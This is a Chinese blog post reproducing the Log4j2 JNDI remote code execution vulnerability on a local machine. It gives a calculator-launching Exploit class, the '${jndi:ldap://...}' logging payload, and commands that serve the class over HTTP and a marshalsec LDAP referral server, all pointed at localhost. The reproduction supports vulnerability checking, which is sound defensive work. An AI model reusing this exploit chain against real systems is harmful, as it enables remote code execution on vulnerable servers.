Log4j2 RCE windows本地复现

漏洞复现
, ,

Log4j2 RCE windows本地复现

注意:先确认该JDK是否默认支持运行jndi

漏洞刚出不久,影响范围巨大,虽然忙着给公司资产排查漏洞,同时在此进行简单的漏洞复现。

1.创建一个恶意的类,这里创建一个弹出计算器的类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
public class Exploit {
    public Exploit(){
        try{
            // 要执行的命令
            String[] commands = {"calc.exe"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch(Exception e){
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}

MAC系统的恶意类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
public class Exploit {
    public Exploit(){
        try{
            // 要执行的命令
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}

2.编译成class类之后运行

java Exploit

image

3.创建一个log4j的类

1
2
3
4
5
6
7
8
9
10
11
12
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class log4j {
private static final Logger logger = LogManager.getLogger(log4j.class);

public static void main(String[] args) {

logger.error("${jndi:ldap://127.0.0.1:1389/a}");
}
}

4.尝试运行,但是发现报错了

image

5.在Exploit目录中开启http服务

1
python37 -m http.server 8888

6.再打开一个shell创建一个ldap的服务

1
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

image

7.再次运行项目

image